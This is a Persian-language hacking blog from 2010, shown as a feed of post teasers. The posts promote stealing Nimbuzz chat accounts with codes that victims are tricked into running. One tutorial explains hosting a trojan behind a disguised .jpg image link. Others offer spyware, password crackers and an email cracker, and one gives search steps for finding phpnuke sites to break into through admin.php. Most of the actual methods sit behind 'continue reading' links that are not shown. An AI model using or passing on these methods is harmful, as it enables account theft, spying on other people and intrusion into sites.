  امروز شما با ويروس Flicker آشنا مي شويد. البته شايد بعضي از شما آن را بشناسيد. چون برنامه نسبتاً معروفي است که بيشتر براي شوخي کردن از آن استفاده مي شود. البته Flicker بيشتر شباهت به يک برنامه اعصاب خوردکن دارد تا يک ويروس. FLICKER در معني به معناي چشمک زن و سوسو زدن است و دليل اين نامگذاري اين است که اين به اصطلاح ويروس کاري مي کند که کاربر هرگاه دکمه اي از کيبورد را فشار دهد، يک صداي بوق، که به آن اصطلاحاً Beep گفته مي شود، از کامپيوتر شنيده مي شود و همزمان با اين صدا، صفحه مانيتور يکبار بطور سريع چشمک مي زند. با اين وضع عملاً کار با کيبورد امکانپذير نيست. اين ويروس از آن دسته است که به کمک رجيستري کار مي کند.

  ادامه مطلب
  + نوشته شده در  Fri 9 Jul 2010ساعت 21:59 PM  توسط foad_0600  | 

  hacke id 2010 !!!!!!!!!!!!!! kaf

  herfeyi haro ham ba in cod age zerang bashin mizanin

  in cod shabihe code id morde ya hacke room hast

  va jai vase shak kardane taraf nazashte

  chon jayi vase zadane esme idish nisss!!!!!!!! jalebe na? are

  shoma mitunin be taraf begin in codo ye emtehani bezane

  taraf ta codo bezane

  idish pak mishe

  va shoma be rahati idisho misazid

  va hack mikonid

  jaleb injas taraf badaz zadane cod khod b khod dc mishe va fkr mikone cod qalate

  inam cod sazande : foad_0600

  + نوشته شده در  Mon 5 Jul 2010ساعت 21:31 PM  توسط foad_0600  | 

  hack va moghable ba an(gheSamte 2|

  maotdavel tarin noe hack; hack az tarighe kode marofe pass chenge ya email chenge hast

  in cod dar bombus zade mishe. hacker code ro be shoma midahad va ghaleban ba name zed hack. anti dc ya flood ya ghire az shoma mikhahad an ra dar xml khod beznid..... nookte mohm ine ke hamishe kasi ke cod ro be shom midahad hacker nist balke moomkne dost samimi shoma bashd . bra etminan az cod ha ya an ra dar internet search konin y ab digaran moghayse kooniin

  hacker ha ba gerftan email shoma va gharar dadane  email khod be tor 100% pass shom ra be dast khahad avard va hich anti hacki nemitonad jeloo an ra begird .

   zira be vasili Emaile password az datebase rest mishe. :S

  ama in code hai kodam hastan . tmam code hai ke dar an Email bashd code hack hast ke marof tarin an pass cheng mibashad. code hai ke dar an register kardan amade bashd. ya esme shon\ma dar an bashd.


  mibind ba dadan in code be shoma ba zadan an shoma hack mishid va niazi be hich etlaate khasi nist .. yade ton bashe hich codio ba idi asli naznid.

  cod dar edame matlab mibashd

  code badi ham code cheng pass hast ke lazme ghorbani code ra dar xml khod bezanad ta pass on be pass delkhah taghir yabad. ke dar in sort baz ba avaz kardan email s


  dar edame rvesh hack kardan ba pak kardan idi va web tghalobi ra khahim goft :D


  ادامه مطلب
  + نوشته شده در  Mon 5 Jul 2010ساعت 20:52 PM  توسط foad_0600  | 

  hack va moghable ba an(ghesamte 1|

  sllam


  shaiad shoma ham az in ke t hack shavid dr nimbuzz ehtiad mikonid. hata ba dashtan ghavitarin anti hack ha .hackerha baz ba mofaghit kare khod ra be etmam misresanand

  ama har hakeri ghader be anjam in kar nist va faght haker hay herfei ghadr be anjam an hasan

  hodode 90 darsad hackerhai id dar nimbuzz mobtadi va gahi chizi az hack sar dar nemiaran

  ama chegone pas in hame idi hack shode va be pass un dast yaftan???ajibe:S

  va moshkelate fravani brai sahab idi bevojod avorde...gahan mohmtarin un inbox bode

  motasefane hack idi bedon gol zdan khode shoma  taghriban ghire momkene. va hamkari shoma braie hack elzami ;)tajob nakonid


  be edame matlb tavajoh konid


  ادامه مطلب
  + نوشته شده در  Sun 4 Jul 2010ساعت 16:55 PM  توسط foad_0600  | 

  be webloger

  salam

  ye khabare dg daram baraton

  0600 blog nevisande migire

  mitoni yeki az mashi...

  bara inkar nimbuzz id ya yahoo id khodeto to nazarat bezar

  -------------------------------------------------------------------------

  + نوشته شده در  Sat 3 Jul 2010ساعت 10:33 AM  توسط foad_0600  | 

  آموزش حرفه ای هک توسط هکر13

  با سلام در این آپلود میخوام آموزش هک کردن آیدی رو بصورت کامل بهتون آموزش بدم . این آموزش به قدری ساده و ابتدایی توضیح دادم که حتی اگه کسی هیچ اطلاعاتی از زمینه هک آیدی نداشته باشه براحتی میتونه آیدی هک کنه. روش هک هم از طریقه ارسال لینک عکس به قربانی صورت می گیرد

   با توجه به حجم بالای در خواستها تصمیم گرفتم این آموزش بصورت کامل براتون بزارم و همچنین معرفی یک فضای رایگان که بتونید تروجان خود را را در آنجا آپلود کنید و همچنین طریقه آپلود تروجان و ساختن فولدر آموزش داده شده ، ابتدا توضیح مختصری راجع به هک از طریق ارسال لینک عکس میدم

  آموزش تبديل کردن يک فايل html به jpg :

  شما یه فضای می خواهید که تروجان خود را در انجا آپلود کنید و همچنین به فضای احتیاج دارید که بتونيد يک فولدر بسازيند مثل : پرشين گيگ يا پارسا اسپيس یا پارسه گیگ

  ابتدا یک نام کاربری از طریق لینک زیر ثبت نام کنید ، این نام کاربری میتونه هر چیز دلخواه باشه بعد از ثبت نام شما وارد پنل خود شوید و یک پوشه مثلا به اسمه mypic.jpg بسازید و فایل رو با اسم و پسوند index.html ذخیره کنید اکنون مانند آموزش زیر عمل کنید

  ابتدا فایل زیر را دانلود نموده و فایلی که دانلود نموده اید را با برنامه ی Notepad باز کنید و سپس از نوشته های موجود در آن کپی گرفته و داخل کادر مرحله 11 آموزش Paste نمایید . بجای your trojan Address که با رنگ زرد در عکس زیر مشخص گردیده، آدرس تروجانی که در سایت آپلود کرده اید را وارد نمایید

  دانلود

   

  از طریق لینک زیر نام کاربری ثبت نام کنید

  http://www.ripway.com/signup.asp


  ادامه مطلب
  + نوشته شده در  Sun 23 May 2010ساعت 11:35 AM  توسط foad_0600  | 

  یک ترفند بسیار جالب در سایت یاهو !

  قصد داریم یک ترفند بسیار جالب و بامزه را به شما معرفی کنیم که به صورت مخفی در سایت یاهو وجود دارد. پیشنهاد میکنیم این ترفند را حتما تست کنید و لذت ببرید.

  اکنون نحوه اجرای ترفند:
  ابتدا پیش از هر کاری Speaker های سیستم خود را روشن کنید .
  حالا به صفحه اصلی سایت یاهو بروید. (www.Yahoo.com)
  اجازه بدهید تا صفحه به طور کامل لود شود
  اکنون به لوگوی قرمز رنگ یاهو در بالای صفحه سمت چپ توجه کنید.
  حالا روی علامت تعجب موجود روی لوگو کلیک کنید!
  یاهوووووووووووووووووووووو

  منبع : شاهوار دات نت

  این ترفند روی دو مرورگر IE و Firefox تست شده است

  + نوشته شده در  Sun 23 May 2010ساعت 11:17 AM  توسط foad_0600  | 

  Net Tools

  to in post ye barname toop vase pc gozashtam . omidvaram khosheton biad .

  alirat 

  alirat

  roye edame click konid !!!!!!!!!!!!!!!!!!!

   


  ادامه مطلب
  + نوشته شده در  Sat 22 May 2010ساعت 14:19 PM  توسط foad_0600  | 

  انتی دی سی

  Download killer defensive 1.0


  جلوگیری از دی سی شدن. نرم افزار مال کامپیوتر می بشاد
  + نوشته شده در  Fri 21 May 2010ساعت 19:24 PM  توسط foad_0600  | 

  Enemy must be down

  + نوشته شده در  Fri 21 May 2010ساعت 13:23 PM  توسط foad_0600  | 

  BOMBUS FOR GIRL

  BOMBUS FOR GIRL


  این بموباس بهترین بوم باس برای خانوم های محترم که در نیم بوز هستند.  .*BOMBUS-Girl ANIMATED SMILEY.*  + نوشته شده در  Fri 21 May 2010ساعت 12:43 PM  توسط foad_0600  | 

  barnameye jasosi

  in barname ham kheyli kar amade

  vase didane type ha va inke taraf ba pcish chikara mikone bedard mikhore

  Download Link 1

  + نوشته شده در  Wed 19 May 2010ساعت 19:13 PM  توسط foad_0600  | 

  hacke password

  baraye bedast avardane passsword haye windows

  in barname kheyli kar amade vase barnamehayi ke passworde onaro nadarim

  mese baziha va bazi cdihaye ramz dar

  az farhange loghat vase peyda kardane password haye foolder ha ya besorate random mitunin

  estefade konin

  Download Link 1

  + نوشته شده در  Wed 19 May 2010ساعت 18:56 PM  توسط foad_0600  | 

  email-cracker

  ino vase yeki az dostam ke sefaresh karde bud gozashtam

  EmailCracker.zip

  nazar yadeton nare .

  + نوشته شده در  Fri 14 May 2010ساعت 16:39 PM  توسط foad_0600  | 

  آموزش هک کردن سایت

  من براي شما دوستان خصوصاْ haajagaميخوام چند تا باگ جديد رو بزارم تا ازشون استفاده کنين.چون خودم php کار می کنم اینو واستون گذاشتم امیدوارم خوشتون بیاد.
  براي شروع به گوگل بريد (http://www.google.com (http://www.google.com/)) و بعد بايد دنبال سايت هايي که از سيستم phpnuke استفاده ميکنن بگرديد , شايد بگيد چه جوري؟
  براي اين کار کافيه اين نوشته رو کپي و پيست کنيد.
  كد:
  modules.php?name=Downloads

  اين ماژول در تمامي ورژن هاي php nuke وجود داره.
  خوب بعد از اين کار گوگل کلي سايت که از سيستم phpnuke استفاده ميکنن مياره
  بريد رويه يکي از لينکها کليک کنيد وقتي سايت باز شد بايد ببينيد که شاخه phpnuke چيه
  ممکنه به اين شکلها باشه: http://blogfa.com/images/smileys/03....smileys/16.gif
  كد:
  http://www.*******.com/phpnuke/mod...?name=Downloads (http://www..*******..com/phpnuke/mod...name=Downloads) http://www..*******..com/html/module...name=Downloads (http://www..*******..com/html/module...name=Downloads) http://www..*******..com/portal/modu...?name=Downloads (http://www..*******..com/portal/modu...name=Downloads) www..*******..com/modules.php?name=Downloads (http://www..*******..com/modules.php?name=Downloads)

  براي اينکه بتونيم از اين روش سايتها رو هک کنيم بايد فايل admin.php رو سايت باشه
  براي اينکه بدونين هست يا نه
  كد:
  modules.php?name=Downloads

  اينو پاک کنين و جاش بنويسيد admin.php


  ادامه مطلب
  + نوشته شده در  Tue 11 May 2010ساعت 18:30 PM  توسط foad_0600  | 

  گشت و گذار پنهانی در وب با Real Hide IP 3.5.7.2 Portable

  http://www.full-dl.com/

  Real Hide IP 3.5.7.2 Portable | 2,21 Mb

  Are you aware that your IP address is exposed every time you visit a website and many websites and hackers use IP addresses to monitor your home address and other personal information? Real Hide IP allows you to surf anonymously, keep your IP address hidden, protect your personal information against hackers and provide full encryption of your online activity, all with a simple click of a button.

  Key Features
  - Hide Your Real IP Address
  - Anonymous Web Surfing
  - Protect Your Identity Against Hackers
  - Un-ban Yourself from Forums or Restricted Websites
  - Prevent Websites from Tracking Your Online Activities
  OS: Windows 2000/XP/Vista/7
  Home Page: www.real-hide-ip.com

  + نوشته شده در  Tue 11 May 2010ساعت 15:49 PM  توسط foad_0600  | 

  ****

  + نوشته شده در  Mon 3 May 2010ساعت 7:49 AM  توسط foad_0600  | 

  مخفی کردن IP در برابر هکرها

  در صورتی که تنها سررشته ای از هک و امنیت را داشته باشید میدانید که بسیاری از هکرها برای نفوذ به سیستم قربانی از IP او استفاده میکنند. با استفاده از این ترفند میتوانید کاری کنید که IP شما برای همیشه دور از دسترس این افراد باشد و به نوعی به طور کامل IP خودتان رو از دسترس دیگران مخفی نگه دارید.  ادامه ی ترفند در ادامه ی مطلب . . .
  + نوشته شده در  Mon 19 Apr 2010ساعت 22:41 PM  توسط foad_0600  |